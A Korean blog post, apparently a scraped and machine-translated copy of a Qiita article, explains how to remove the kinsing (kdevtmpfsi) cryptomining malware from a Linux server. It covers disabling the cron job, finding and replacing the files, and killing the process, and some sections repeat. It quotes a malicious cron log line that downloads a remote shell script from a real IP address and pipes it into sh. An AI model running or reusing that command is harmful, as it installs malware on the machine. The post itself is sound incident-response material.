악성 코드 kinsing (kdevtmpfsi) 제거하는 방법
소개
cryptocurrency를 마이닝하는 악성 코드 kinsing (kdevtmpfsi)에 감염 되었기 때문에 삭제하는 단계를 기록합니다.
CPU 사용률 99%!
삭제 방법
cron 무효화
1분 간격으로 정기 실행되고 있는 cron을 삭제·재작성해, 사용할 수 없게 합니다.
rm /var/spool/cron/apache
mkdir /var/spool/cron/apache
chmod 755 /var/spool/cron/apache
맬웨어 파일 검색
find / -name kdevtmpfsi
find / -name kinsing
여러 디렉토리에서 대상 파일을 찾을 수 있습니다.
내 경우에는 다음 5 디렉토리
cron 무효화
1분 간격으로 정기 실행되고 있는 cron을 삭제·재작성해, 사용할 수 없게 합니다.
rm /var/spool/cron/apache
mkdir /var/spool/cron/apache
chmod 755 /var/spool/cron/apache
맬웨어 파일 검색
find / -name kdevtmpfsi
find / -name kinsing
여러 디렉토리에서 대상 파일을 찾을 수 있습니다.
내 경우에는 다음 5 디렉토리
맬웨어 파일 비활성화
파일 검색에서 발견된 악성코드 파일(kdevtmpfsi 및 kinsing)을 삭제하고 다시 작성하여 사용할 수 없도록 합니다.
rm ./kdevtmpfsi
touch ./kdevtmpfsi
chmod 644 ./kdevtmpfsi
rm ./kinsing
touch ./kinsing
chmod 644 ./kinsing
kdevtmpfsi ○○라는 파일이 많이 발견되면 모두 삭제합니다.
rm -rf ./kdevtmpfsi*
프로세스 삭제
검색하고 나온 프로세스를 kill합니다.
ps -ef | grep kdevtmpfsi
kill 9999
결론
덧붙여서 cron의 로그에는 무서운 것 같은 로그가 많이 나와 있었습니다.
vi /var/log/cron
日付 CROND[21134]: (apache) CMD (wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1)
日付 crond[18693]: (apache) INFO (Job execution of per-minute job scheduled for 14:13 delayed into subsequent minute 14:15. Skipping job run.)
참고 사이트
vi /var/log/cron
日付 CROND[21134]: (apache) CMD (wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1)
日付 crond[18693]: (apache) INFO (Job execution of per-minute job scheduled for 14:13 delayed into subsequent minute 14:15. Skipping job run.)
Reference
이 문제에 관하여(악성 코드 kinsing (kdevtmpfsi) 제거하는 방법), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다 https://qiita.com/yhishi/items/63543ebaf0fe09c2fa4b텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
우수한 개발자 콘텐츠 발견에 전념
(Collection and Share based on the CC Protocol.)
좋은 웹페이지 즐겨찾기
